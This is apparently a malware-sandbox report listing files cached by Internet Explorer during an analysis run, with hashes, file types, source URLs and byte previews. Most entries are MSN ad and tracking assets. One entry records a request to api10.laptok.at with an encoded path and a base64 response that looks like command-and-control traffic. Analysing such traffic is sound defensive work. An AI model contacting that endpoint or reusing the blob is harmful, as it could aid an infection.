SHA-256:	3F064BBEE1C4DD634A9717471B7F4A2B8C3CD7A1E2AF9A41773AFFAC262DB5BC
SHA-512:	E17F82DD4578DE16266F50F988EC60B75494A577935CE88E630D12B4C088C483719CCBEE7E329E418B3210C30344BDE617CFD74BB598BCCC5B719E2C0DAFE21B
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cZjo7.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=526&y=156
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......Sf.....p..$..L..[..+.)c\..sy..:{.N:..R....w..Z..fy..<....+V.Qi"_.xN.#=Ey..l.~..R.N.[...\|?...H..Q.\3..{4.....-v.k.=_..U..C...5.e.mL...&.....oj.\X_H4..E.Fp...'.)...K.......U....Y...j.....9l...X1.BrX{.o.[..4.ki`.4...G.......^......\..:=..w;......]^..?\.4{..0.0.a.D..B).E..RFi..]..(.O5....j..\c..Y...u.k:I......\|m.\|........Y.P.;.KG.$.y.9....J.c.a....Ej`Q.Y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBIbVOm[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	795
Entropy (8bit):	7.615715234096511
Encrypted:	false
SSDEEP:	12:6v/78/W/6TUdZVAZD/rc+c/AGljTpHqd2zBMrsLlZBYVWyMrnqEO03AGjfjjt7:U/6oYt/RcVl3pH822cRyMrnG03dx7
MD5:	0B075168CF2D19C936A0BF1A34ADE0F0
SHA1:	429B62EEB83C1B128700DC025F68599425BC5552
SHA-256:	39CA855FDCA2C76CDFA82B17AE0331D2B24D84029E16F8347DACBE2E02818138
SHA-512:	4AC96302CCC33EABF482360B6D2EB2B26FDD7959574036A75B324344A5901F1888DABA0F1893CB2DE8F0276F0FCBC25CE832171497DCDC29018BBD07684395C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbVOm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OuS.KTQ......8.`..FV&a.BGP..\.n..Ei_..iBD...h.(.hQZ-Z..q!.}....-"...4.r..x...w....s....... T~.'..).kd..D.$go....S.C...+..h.H..[.f.C.#..lp..&Cih..}...e.....@@.....'.^f(p.gZ.#..HOJ.+qH...tV%....`..xZ.Q....pe[5E.2.C$R... .0.N..../.u...2.?W.....H&.D%kQ...`Q...G...i...!.%..W.........2.I..o..h?..L..W.s...hBi[#....\....\|..(i.S.p..1z.....SD..B.m..<&.....-......z+.6.-V5...7m...&V.\|....)...s:._..,m..}....e......T.=y..<..4Ms...$..u..I....~....].r.@j9...W07<.(.c.G...Z....o#...,.B.h..-.....{130.h....._R@+A;I0..k;8.6\|...Om.!Y.6........\\..{:Y.zF.R....wg..z......pF..sZ$.H.._...u.mT.......:V3.....;@...&..Y..+..NNw.D..a..B..W."..=.).....4....=....T.(.J......e..w....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBZ3zrM[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	762
Entropy (8bit):	7.614206271808948
Encrypted:	false
SSDEEP:	12:6v/78/W/6Tr7wRY1xnBIIpFHsY6ppwWyqx40riXsto+JLNLX8TW9SxOaJrJEQIYR:U/6AIOQFHsY6pGqBiXsttxsTLxOaJrJ9
MD5:	4948BCF4790FCC1A155C882BB00882E1
SHA1:	B99BA11A86E5D0798DF7EBA4EB3490DC8AAA8523
SHA-256:	6A989B924D2197375361EEA4F4BD018D02F664AE3A2B11F4255E486A5F8691B7
SHA-512:	ED70FACA673FD63076CC53DF9E9AE28E0A7FBF7DE177F5E1DA266220BBA136BA4F657DDBD3EEA3D20B5B7F938D389F62885E96BB03CFCB53C2D49B30536EA675
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZ3zrM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OeSOO.Q.....Bi......&.h.!.h....x......$.M.\|.o...9z.^.d...Q...."...t.m...8.-........}o..q..@...O'.^9\|.).7]5H...'+M5.!......M^@.....?]..m::..V.C.1.8..@..........t..1.fD.3}..y.w..#b(.:....~....$M...&...HGM....$.,?.X.X~.7..`.3.S...8......"Y...v.?.....~5C.......d.CY;..!jh..aat~.k.'......r.).Dtp..9.s.:.../..~..x2....l...g.rB'R..L.^-...t.p.p..S.U..r.>.[.E.GJ...t.\|..J.*.:m......p2G.z...r.~.K.a`0.@.".F..]L.._\N.7....?..Lo:..j\|t......F.ke.#..x..."...B.#./.n(..9%..<\|/.....o...<n..;y.j.J6..G....`.3[c.....Q.G3.`86.>\..%.,.\.L-...p=...c..r.%.\|..... ..1f....w....$..2j..@x.....5.-.\};!s..C....5..'V6....&~[...I...j.]K....:....2.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	25775
Entropy (8bit):	5.682528076395053
Encrypted:	false
SSDEEP:	768:5u+/usrMw08otvyk+ss+U+XXhl84MpzdqrIVL:5uoFZ3o4DSHn8XnqrI1
MD5:	A46697313B9E4B94A82C2EC1782A1CF1
SHA1:	45276956F9D8D63C620B36B56B6BAABBB23893F1
SHA-256:	B32C162EF699E3CF10F5EA0383F1C2D10854600A979B28252F51D27C61700254
SHA-512:	B521F234AC45948509E31EE179EC9AA698C05ACF4127E399C0552297B225D6ECFCBC51DE8AC9B48C3BCD72074E6BB8517E4CCCA2A1FC9322B38AC8E0DB767196
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=6b9a7eb97599425ea1e0ed495958bc99&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&_=1611307345159
Preview:	.<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_90a19eaf2de79c1a42fa46cccfbb36f5_1745ffb8-54b7-4a5b-a75b-4bd063f3e438-tuct7041ed5_1611307349_1611307349_CIi3jgYQr4c_GOKz5tOH5uL8BSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ"},"tbsessionid":"v2_90a19eaf2de79c1a42fa46cccfbb36f5_1745ffb8-54b7-4a5b-a75b-4bd063f3e438-tuct7041ed5_1611307349_1611307349_CIi3jgYQr4c_GOKz5tOH5uL8BSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ","pageViewId":"6b9a7eb97599425ea1e0ed495958bc99","RequestLevelBeaconUrls":[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"taboola","e":true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">.<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20647
Entropy (8bit):	5.29809706323854
Encrypted:	false
SSDEEP:	384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
MD5:	F469156B30F21DBBE8753F150558C99B
SHA1:	399066F1A989B29D1089995284F0F137E2AFFD7B
SHA-256:	9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
SHA-512:	97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20647
Entropy (8bit):	5.29809706323854
Encrypted:	false
SSDEEP:	384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
MD5:	F469156B30F21DBBE8753F150558C99B
SHA1:	399066F1A989B29D1089995284F0F137E2AFFD7B
SHA-256:	9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
SHA-512:	97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20647
Entropy (8bit):	5.29809706323854
Encrypted:	false
SSDEEP:	384:P9AGm6ElzD7XzeMk/lg2f5vzBgF3OZOoQWwY4RXrqt:REJDnci2RmF3OsoQWwY4RXrqt
MD5:	F469156B30F21DBBE8753F150558C99B
SHA1:	399066F1A989B29D1089995284F0F137E2AFFD7B
SHA-256:	9236F0A1E3955530ACDA603B7D05323A1F6FC90C97845C435F64F0903D681D4B
SHA-512:	97387740076877139B7D4E9CF163F38012712968259F2E20ABD7190B1F1883F99DCDBBC402FCF9AB46C49655EDBBB0FBFAA52097F57774A2A2D6BB077698FDA1
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_0eae2fe61e6ffcfcfe353bd536e5886d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	11083
Entropy (8bit):	7.946609507325561
Encrypted:	false
SSDEEP:	192:/8euqb04RTVrk0wsmJgVSWYdXRrHKHnyGM8quczIDlxjXQzALLmC8:/8eJbXRTW0zCgYdXRrHKHnyG8uLHjLd8
MD5:	2FDC52F71185A2062B4CF1A6ADECB819
SHA1:	3F2C79D4A1E83AF373BA45E8A3F74B37F992E4D9
SHA-256:	B24277AC65AB8C12512B6F40A5F06FDA33A723889C8EBAFEA8E47416650FDB93
SHA-512:	F87D7BCACCC379A22784D5BC7B4021DA91E8D256BD133A355A5DE87F22C1863570625C8CFA621B48131771F6B7992B4B068987CD9E588A31B8D28425723E766F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0eae2fe61e6ffcfcfe353bd536e5886d.jpg
Preview:	......JFIF..........................................."......".$...$.6&&6>424>LDDL_Z_\|\|.............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...."..........5..................................................................N...#..C...&K}{...i$o)...by....:.!.#Teo.E..M.5.]..T.j..&..W...o...k...q.#.z.......a)...2..[..b.vTnm.}=V.<:.O.+2...[...1].Tv..u.F^...^.U...4..\.s..]...._.....{..Jk...i.YVWmB...D.Z!./Q.5}5...-...@\.p..rOW.....!..3...(l..._.......spk.@.V.9./..xc.C...m...g.......IdK...m.K.........'x2...!.I4.5.V...W\.......v.)..y....t..y.F..=.......2.-IO..Pdx^....../CW._=6r...^;.9..w....X.7...\|].v..@....].z#gl....J.S..4Z.R.2T/..Stqm....u...Z:.6.....5..>4.`.-..y_D;.tPM]...A......1X4KR9X.:..(...+,...J.P)}..{.Y\|q..g...1.....~..S.}..0l.I..@B...'t..."...W...'......~..;.......\|JP.q3.('....u=}B^T.... Z.%....).......L..cFU{2.......Zm.;es....f#nT...H.mg.....z1*...(....\....F...g%.Z....#%pDYU...6.9<......Y..X.^t..........O.}7t#......$>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_GETTY_IMAGES_IBK_606910635__VqZNjsRU[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	8977
Entropy (8bit):	7.947479110101718
Encrypted:	false
SSDEEP:	192:6WrMcvUSzHvTwhK1b1vf9ZZXlZ/XFvMWUsH/WEqfkNGEy4Yr:6HcvTzsKd19/Xl9lj3WEVGEy4q
MD5:	C4931E6BBCB5E90E5EC143703BD2F152
SHA1:	E4125F6F6032BDD229222C7C906EE1DCF8EAFE48
SHA-256:	F559E194A2F4A3AABF0882D74E5B3B253065FF4C40CC029D11A0F1157382BA2F
SHA-512:	76A79AE3BCEC3F764AFB31020819CF464F4531416D11BC60CB406CC996985E23D7416A29C8398D5CEA7770B20EBFF673E97DC3FBDC9F9D94EEDF22E0E780ED41
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F606910635__VqZNjsRU.jpg
Preview:	......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........3................................................................. ....h$.Z.+...)Q.Ix'u.......@..pa.pS..Y.%V[+5Q.x..VZ.c..u".W......O..T....UGYB.YB%{.c.9Z.q..a....R>..s.6.....n..<f.}.-..[....+.F..D.:!YT.e.%.?A........8C...........o.F.....@.aY.+.e!Yd...qQ.".}.e..y\...<....f-u.`0CC;y.....l,T...^..#.r.6.v.\.6..}@.'c.yd........OX...J...+....[...0....ZHR[2S\|L...4.,.g...U...3tvL.].("U{....=..k.O...mtJ.x.N..j..$njz...k..m.v......=n......_.;]....+.....r..>V:N....2.R..E.v..<....s.\.{.\|X........<GK.P,.V>u {.N...%....._yx2T..._D.'.....m...<..Y.....NH.......xI......u}.Q.....V?`.=....8h.13../Vih..?&...:..Y,E7>b......Z.,e.E..k...M...s.f\..1~..}.3.q....i<.._.bJ=<...Nb....x$..A....b....k...me... J.!r...A~qO..j.......$..7-........,......OF.,..g....1...].ka....1l2r...T~....@...aj9r..<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\otSDKStub[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	12814
Entropy (8bit):	5.302802185296012
Encrypted:	false
SSDEEP:	192:pQp/Oc/tyWocJgjgh7kjj3Uz5BpHfkmZqWov:+RbJgjjjaXHfkmvov
MD5:	EACEA3C30F1EDAD40E3653FD20EC3053
SHA1:	3B4B08F838365110B74350EBC1BEE69712209A3B
SHA-256:	58B01E9997EA3202D807141C4C682BCCC2063379D42414A9EBCCA0545DC97918
SHA-512:	6E30018933A65EE19E0C5479A76053DE91E5C905DA800DFA7D0DB2475C9766B632F91DE8CC9BD6B90C2FBC4861B50879811EE43D465E5C5434943586B1CC47F1
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
Preview:	var OneTrustStub=function(t){"use strict";var l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}},e=(i.prototype.initConsentSDK=function(){this.initCustomEventPolyfill(),this.ensureHtmlGroupDataInitialised(),this.updateGtmMacros(),this.fetchBannerSDKDependency()},i.prototype.fetchBannerSDKDependency=function(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\twu[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	340060
Entropy (8bit):	5.9999220463029195
Encrypted:	false
SSDEEP:	6144:Y3VnRuDf75mL7ri+HuhvZAA95EmlJN4sZv54hNQnfajoxuKO1kKtJYLhyEA+ogb8:aqf75mneI8ZzkgPZvOhNQfElKO1ttcbU
MD5:	CFE4530391ED2878F814492182E7A9E5
SHA1:	DB44AAE137B31FB37E0DAB2D641FC9B8FE54DD6E
SHA-256:	B6A7B6CC6C3137B40680E5B2F869B2AD540D2A199638D4F759DF3BF0627B7E72
SHA-512:	34D083FAF8C665A522E3A9A45C9A13ED975A36D7C25C2F7162F65821637913C01F16C0F699FF8145FA2AD7A26C41AB91C37FEC86D2FA9860729ACD39EEBE35A0
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzrdZB3VXtwr/czINvqLVnHAqL34hBx/_2F4Uw8ch/lO8_2BdQScLQi_2B7dkM/Y6U5VEgT5klQ01W1Rxk/oP4yI983nfNNLWO0FdmkwO/SlYApRJyCflSJ/F9Sp1wFu/11p6fGFU0cz_2F0ouRmTqJI/Jp2cYIM8B8/Yut84Zr03wWkVJ8HW/_2Bs4q032lo5/cXLpMBT2Oue/wmMCk0Do0CwkFa/R5_2BwVrdhg4SycoUpM1q/WdY_2FMtLacKdQm6/_2B87YclJ9Jv74j/B_2BPGCFKoDrv4QA/twu
Preview:	hWKSbi61cG55W3b6L2we1ZH2PvWsKx8XigsM2mNYdS8Vo+FSSE4LFwnu55G8O+MDCGolCcFW3VNasrMsGH8h+6IxIWXgcnuRJYomse+KdGj31+PJau3oGhaLjjRYCfAYVT1pIc45yIY4+u6jT5fhU0Y8TsN2W0BmxLWI8NEArwCL1UTFtSmAxGBrU4c4Kox94EoXzaihJGqKtCl9XldKbV5k6kWMm3EpSMC4xrD82xx0ewmaDGocc1EjYesdJ6NqUz3zsuRE7cy35j3AXzZq6cbKcsBbfbUTpHXy2CBVp9Bo+9FPwF2oj6aATB2QvdAUTVNv0LwEdFxu8x+dGDtYn371978aUnEVPrCSy5RL+YD/cVm/t6gQSKxjFGrVrunf/74Zu3h5CjDu3WxjkWtetZAlU+4UCb3ecM18rtBgL8cVZcUHnTaRxySpRSaFfU+tCuYHZ4oFjCbIGev5VzakI6S/n5Sc1jMxXjisQ+aRXuYuY8p1rZa+fyadwrlvg3xV5S5Fiy7AzVjj1uBkom3ws0j9kX7qeE1+HHacOqv1L+/+kF7pO8daPR4pBuAAc7JNSqKp2IDIzh58S1x3D5Kfo4O15UUxXZLk7g0jTD7Xv7rUJqjsQ1xW9/DLH7NcjOVD9lNoXPWr+CaaOQbY37tYsTq3ZoX6wHQPjGf51kyn81DtsXxTl5wB6PWYVn0H9yoadbY6JgZobVAH35YztVb2ExaWDmGLed3Ohq8SmSFzg2uO0dR0e52ZWGrs3Djd1q4zA1K9SE4FS0nGi7z1q/GXoXzf+urEYyq6Ke6VDWFqgB+iD0JOuKTzbKkRzCwlGEzqNLt1Rr0ap0TAOhMQQHTp2//ImWOsoA2bShjb8tyRlMN+6WnWdlh4zXG9H67seR86c3mzwxvVfKP+CfaAwuk5T6zecrUFa87b9TKwkjuWClwYAMCl83F3xLDXZxhgJACB9ZuzPEpDvKC11x21U1eNTcoeBRVQobokOFE+ay2/

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\41-0bee62-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1238
Entropy (8bit):	5.066474690445609
Encrypted:	false
SSDEEP:	24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
MD5:	7ADA9104CCDE3FDFB92233C8D389C582
SHA1:	4E5BA29703A7329EC3B63192DE30451272348E0D
SHA-256:	F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
SHA-512:	2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
Malicious:	false
Preview:	define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin\|\|(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\58-acd805-185735b[1].css Download File
